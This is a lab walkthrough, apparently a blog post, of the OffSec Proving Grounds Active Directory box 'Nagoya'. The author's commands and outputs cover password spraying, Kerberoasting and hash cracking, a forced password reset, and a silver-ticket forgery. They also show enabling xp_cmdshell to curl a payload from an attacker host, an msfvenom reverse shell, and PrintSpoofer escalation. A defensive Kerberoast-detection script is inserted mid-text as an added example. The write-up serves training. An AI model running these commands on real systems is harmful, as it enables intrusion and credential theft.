Proving Grounds — Practice — Nagoya
Published 2026-3-27 11:3:18. Author: infosecwriteups.com

Makoyi


Image from Offsec’s practice box Nagoya

Proving Grounds Practice box Nagoya is rated hard, but the community has rated it as very hard. The rating aside, this box is exceptional practice for Active Directory for the OSCP exam. The initial foothold was a bit challenging, and definitely earned the community’s rating. That being said, let’s crack into it.

— NMAP Scan

makoyi@kali 26/03/26 [~] 
❯ sudo nmap -Pn -n 192.168.185.21 -sC -sV -p- --open
[sudo] password for makoyi:
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-26 12:23 -0500
Nmap scan report for 192.168.185.21
Host is up (0.081s latency).
Not shown: 65512 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Nagoya Industries - Nagoya
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-26 17:27:31Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: nagoya-industries.com, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: nagoya-industries.com, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-03-26T17:29:01+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=nagoya.nagoya-industries.com
| Not valid before: 2026-03-25T17:21:30
|_Not valid after: 2026-09-24T17:21:30
| rdp-ntlm-info:
| Target_Name: NAGOYA-IND
| NetBIOS_Domain_Name: NAGOYA-IND
| NetBIOS_Computer_Name: NAGOYA
| DNS_Domain_Name: nagoya-industries.com
| DNS_Computer_Name: nagoya.nagoya-industries.com
| DNS_Tree_Name: nagoya-industries.com
| Product_Version: 10.0.17763
|_ System_Time: 2026-03-26T17:28:22+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49691/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
49717/tcp open msrpc Microsoft Windows RPC
Service Info: Host: NAGOYA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-03-26T17:28:22
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 353.54 seconds

Alright, so the first couple of things that pop out are port 80, hosting the website, port 135 for RPC, and port 5985 for WinRM. Let’s start by taking a look at the web server on port 80. There wasn’t much on the main page, but the Team link at the top drew my attention.


The first thing I did here was create a user list in the format firstname.Lastname.

matthew.Harrison
emma.Miah
rebecca.Bell
scott.Gardner
terry.Edwards
holly.Matthews
anne.Jenkins
brett.Naylor
melissa.Mitchell
craig.Carr
fiona.Clark
patrick.Martin
kate.Watson
kirsty.Norris
andrea.Hayes
abigail.Hughes
melanie.Watson
frances.Ward
sylvia.King
wayne.Hartley
iain.White
joanna.Wood
bethan.Webster
elaine.Brady
christopher.Lewis
megan.Johnson
damien.Chapman
joanne.Lewis

The second thing was to create a password list to try out. If you look at the bottom of the team page, you’ll see that the website was created in 2023, and without any other context to use, I created a password list of the seasons combined with 2023.

Spring2023
Summer2023
Fall2023
Winter2023

Now that we have a user list and a password list, it’s time to see if anyone used those credentials.

makoyi@kali 26/03/26 [~] 
❯ crackmapexec smb 192.168.185.21 -u users -p pass --continue-on-success
SMB 192.168.185.21 445 NAGOYA [*] Windows 10 / Server 2019 Build 17763 x64 (name:NAGOYA) (domain:nagoya-industries.com) (signing:True) (SMBv1:False)
<snip>
SMB 192.168.185.21 445 NAGOYA [+] nagoya-industries.com\craig.Carr:Spring2023
<snip>
SMB 192.168.185.21 445 NAGOYA [+] nagoya-industries.com\fiona.Clark:Summer2023
<snip>

Luckily for us, two accounts turn out to have weak password practices. Using fiona.Clark’s credentials, let’s check SMB and see if we can find anything.


Nothing in particular sticks out, so now let’s just check the shares to see if there’s anything interesting.


Through enumeration, we find an interesting executable, ResetPassword.exe. Using Ghidra, let’s see if there’s any information we can use.

- File -> New Project
- File -> Import File ResetPassword.exe
- Open Code-Browser
- Drag the .exe file to Code-Browser
- Analyze
- Window -> Defined Strings

Alright, the defined strings give us a service account (svc_helpdesk) and its credential. Just to double back and make sure there was nothing I missed, I’m going to run impacket-GetUserSPNs to see if there are any other accounts I can grab.

makoyi@kali 26/03/26 [~] 
❯ impacket-GetUserSPNs -dc-ip 192.168.185.21 nagoya-industries.com/fiona.Clark:Summer2023 -request
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------------- ------------ ------------------------------------------------ -------------------------- -------------------------- ----------
http/nagoya.nagoya-industries.com svc_helpdesk CN=helpdesk,CN=Users,DC=nagoya-industries,DC=com 2023-04-30 02:31:06.190955 <never>
MSSQL/nagoya.nagoya-industries.com svc_mssql 2023-04-30 02:45:33.288595 2024-08-03 12:48:01.815298

[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc_helpdesk$NAGOYA-INDUSTRIES.COM$nagoya-industries.com/svc_helpdesk*$47a9f7afd5e978d5f965285586ca527f$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
$krb5tgs$23$*svc_mssql$NAGOYA-INDUSTRIES.COM$nagoya-industries.com/svc_mssql*$613500debadca60e20acc2d544d88687$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

We find two accounts and their TGS hashes, so now it’s time to save them to a file and use hashcat to crack them.

makoyi@kali 26/03/26 [~] 
❯ hashcat hash /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2) starting in autodetect mode
<snip>

13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol

<snip>

$krb5tgs$23$*svc_mssql$NAGOYA-INDUSTRIES.COM$nagoya-industries.com/svc_mssql*$613500debadca60e20acc2d544d88687$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:Service1
Approaching final keyspace - workload adjusted.

Alright, another service account’s credentials. Now it’s time to see what we can access with these two accounts. Looking at the Nmap scan again shows that port 1433 for MSSQL is not open externally, so let’s start with svc_helpdesk to see what we can find.
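Both Kerberoast hashes above begin with $krb5tgs$23$: the service tickets were issued with encryption type 23 (RC4-HMAC), whose key is the service account's unsalted NT hash, which is why hashcat mode 13100 can test rockyou.txt against them so quickly. A domain controller logs every TGS request as event 4769 with the requested ServiceName and TicketEncryptionType, so the request itself is detectable. The Python below is an added example, not code from the original write-up: it parses the hash-line format printed by impacket-GetUserSPNs and runs a small detector over constructed 4769 events, flagging a single account that requests RC4 tickets for several user-owned SPNs. The event tuples, the workstation address and the threshold are assumptions; 0x17 and 0x11/0x12 are the documented RC4 and AES encryption-type codes.

```python
from collections import defaultdict

RC4_HMAC = 0x17            # etype 23: key = NT hash, crackable offline (hashcat 13100)
AES_ETYPES = {0x11, 0x12}  # AES128 / AES256-CTS-HMAC-SHA1-96: PBKDF2-derived, salted


def parse_krb5tgs(line):
    """Split a hashcat '$krb5tgs$<etype>$*user$REALM$spn*$checksum$edata' line
    (the format impacket-GetUserSPNs prints, as on this page) into its fields."""
    parts = line.split("$")
    if len(parts) != 8 or parts[1] != "krb5tgs":
        raise ValueError("not a $krb5tgs$ line")
    return {"etype": int(parts[2]), "user": parts[3].lstrip("*"), "realm": parts[4],
            "spn": parts[5].rstrip("*"), "checksum": parts[6], "edata": parts[7]}


# Constructed 4769 (service ticket requested) events:
# (time, requesting account, client IP, ServiceName, TicketEncryptionType).
SAMPLE_4769 = [
    ("2026-03-26T17:40:01", "fiona.Clark", "192.168.45.248", "svc_helpdesk", 0x17),
    ("2026-03-26T17:40:01", "fiona.Clark", "192.168.45.248", "svc_mssql", 0x17),
    ("2026-03-26T17:41:10", "joanna.Wood", "192.168.185.50", "NAGOYA$", 0x12),   # host ticket, AES
    ("2026-03-26T17:42:00", "NAGOYA$", "192.168.185.21", "krbtgt", 0x12),        # TGT renewal
    ("2026-03-26T17:43:00", "joanna.Wood", "192.168.185.50", "svc_mssql", 0x12),  # normal AES SQL ticket
]


def is_roast_candidate(service_name, etype):
    """RC4 ticket for a user-owned SPN (not a machine account, not krbtgt)."""
    return (etype == RC4_HMAC and not service_name.endswith("$")
            and service_name.lower() != "krbtgt")


def detect_kerberoast(events, min_services=2):
    """Group RC4 user-SPN requests by (account, client IP); one requester
    collecting tickets for several such accounts is the GetUserSPNs -request
    signature. Returns {(account, ip): [service accounts requested]}."""
    per_requester = defaultdict(set)
    for _ts, account, ip, service, etype in events:
        if is_roast_candidate(service, etype):
            per_requester[(account.lower(), ip)].add(service.lower())
    return {k: sorted(v) for k, v in per_requester.items() if len(v) >= min_services}


if __name__ == "__main__":
    print(detect_kerberoast(SAMPLE_4769))
```

The cheapest fix the detector points at is on the account side: set msDS-SupportedEncryptionTypes on svc_helpdesk and svc_mssql to AES only, so a requester can no longer obtain an etype 23 ticket at all, and give those accounts long random passwords (or make them gMSAs) so the AES ticket is not crackable either.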


I figured that, being the helpdesk account, it probably has remote access permissions, so I tried the credentials with rpcclient first.

makoyi@kali 26/03/26 [~] 
❯ rpcclient -U nagoya-industries/svc_helpdesk 192.168.185.21
Password for [NAGOYA-INDUSTRIES\svc_helpdesk]:U299iYRmikYTHDbPbxPoYYfa2j4x4cdg
rpcclient $> enumusers
command not found: enumusers
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[svc_helpdesk] rid:[0x450]
<snip>
user:[Christopher.Lewis] rid:[0x46c]
<snip>
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[employees] rid:[0x451]
group:[helpdesk] rid:[0x466]
group:[developers] rid:[0x46a]

Alright, my hunch was correct and we can log in. We take a look at the users and groups first, and then see which groups each user is in. After going through every account, we find that Christopher.Lewis is the only user in three groups, one of which is developers.

Using the helpdesk account’s privileges, we go ahead and change Christopher.Lewis’s password.

rpcclient $> setuserinfo christopher.lewis 23 'Password123'

Afterwards, let’s check the credentials and see if we can log in over WinRM.

makoyi@kali 26/03/26 [~] 
❯ crackmapexec winrm 192.168.185.21 -u christopher.Lewis -p Password123
SMB 192.168.185.21 5985 NAGOYA [*] Windows 10 / Server 2019 Build 17763 (name:NAGOYA) (domain:nagoya-industries.com)
HTTP 192.168.185.21 5985 NAGOYA [*] http://192.168.185.21:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 192.168.185.21 5985 NAGOYA [+] nagoya-industries.com\christopher.Lewis:Password123 (Pwn3d!)

Success. Once logged in, you can find the local.txt file at C:\local.txt.


Looking around, we find that the only other users on the machine are Administrator and svc_mssql. We already have the password for svc_mssql, so I went that route first. I figured that it might be too easy to log right into the account over WinRM, but I tried it anyway, and was right. Next, let’s check whether any services are listening only internally.


Now that we’ve found MSSQL running, let’s transfer chisel over and set up a tunnel for it.

makoyi@kali 26/03/26 [~] 
❯ ./chisel_linux server --reverse --socks5
2026/03/26 14:55:37 server: Reverse tunnelling enabled
2026/03/26 14:55:37 server: Fingerprint crbGWRGGrMs6oTZ0SDFqZiF9muFw7anjx8UlAvmOH1o=
2026/03/26 14:55:37 server: Listening on http://0.0.0.0:8080
2026/03/26 14:56:16 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Downloads> .\chisel.exe client <ATTACKER IP>:8080 R:socks

I logged into svc_mssql, but couldn’t find anything useful, so I changed direction and used the credentials to forge a silver ticket to attempt to escalate to a more privileged account. I used https://codebeautify.org/ntlm-hash-generator to turn the password for svc_mssql into a hash, but you can choose any way you’d like. For the domain SID, you can use PowerShell and the command Get-ADDomain, but I had run enum4linux early in my enumeration phase and already had the domain SID.

To grab the SPN:

Get-ADUser -Filter {SamAccountName -eq "svc_mssql"} -Properties ServicePrincipalNames

makoyi@kali 26/03/26 [~] 
❯ impacket-ticketer -nthash E3A0168BC21CFB88B95C954A5B18F57C -domain-sid S-1-5-21-1969309164-1513403977-1686805993 -domain nagoya-industries.com -spn MSSQL/nagoya.nagoya-industries.com -user-id 500 Administrator
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for nagoya-industries.com/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache

Now we need to export the ticket for use.

makoyi@kali 26/03/26 15:57 - 192.168.45.248 [~] 
❯ export KRB5CCNAME=$PWD/Administrator.ccache

Now create /etc/krb5user.conf

[libdefaults]
default_realm = NAGOYA-INDUSTRIES.COM
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
rdns = false
dns_canonicalize_hostname = false
fcc-mit-ticketflags = true

[realms]
NAGOYA-INDUSTRIES.COM = {
kdc = nagoya.nagoya-industries.com
}

[domain_realm]
.nagoya-industries.com = NAGOYA-INDUSTRIES.COM

Log in to nagoya.nagoya-industries.com with the ticket and enable xp_cmdshell.

makoyi@kali 26/03/26 [~] 
❯ proxychains impacket-mssqlclient 'nagoya-industries.com/svc_mssql':'Service1'@192.168.185.21 -windows-auth

makoyi@kali 26/03/26 [~]
❯ proxychains impacket-mssqlclient -k nagoya.nagoya-industries.com
<snip>
SQL (NAGOYA-IND\Administrator dbo@master)> EXEC sp_configure 'show advanced options', 1;
INFO(nagoya\SQLEXPRESS): Line 196: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (NAGOYA-IND\Administrator dbo@master)> RECONFIGURE;
SQL (NAGOYA-IND\Administrator dbo@master)> EXEC sp_configure 'xp_cmdshell', 1;
INFO(nagoya\SQLEXPRESS): Line 196: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (NAGOYA-IND\Administrator dbo@master)> RECONFIGURE;

After enabling xp_cmdshell, I used msfvenom to craft an executable payload that initiates a reverse shell connection.

makoyi@kali 26/03/26 [~] 
❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.248 LPORT=445 -f exe -o rev.exe

Now we transfer the file over to the machine.

SQL (NAGOYA-IND\Administrator  dbo@master)> xp_cmdshell "curl http://<ATTACKER IP>/rev.exe -o C:\temp\rev.exe"

With a listener set up through netcat, we execute the payload and gain a reverse shell.

makoyi@kali 26/03/26 [~] 
❯ sudo rlwrap -cAr nc -lvnp 445
[sudo] password for makoyi:
listening on [any] 445 ...
connect to [<ATTACKER IP>] from (UNKNOWN) [192.168.185.21] 50068
Microsoft Windows [Version 10.0.17763.4252]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nagoya-ind\svc_mssql

Checking the permissions of the account, we find that SeImpersonatePrivilege is enabled, which means we can use PrintSpoofer to escalate to Administrator.

After transferring PrintSpoofer64.exe over, we escalate to Administrator and find proof.txt at C:\Users\Administrator\Desktop\proof.txt.

C:\>\Temp\PrintSpoofer64.exe -i -c cmd.exe
\Temp\PrintSpoofer64.exe -i -c cmd.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.17763.4252]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>type C:\Users\Administrator\Desktop\proof.txt
type C:\Users\Administrator\Desktop\proof.txt

Thank you for reading.

I hope this walk-through helps, stay ethical, and happy hacking.


Source: https://infosecwriteups.com/proving-grounds-practice-nagoya-19eec0a917a1?source=rss----7b722bfd1b8d---4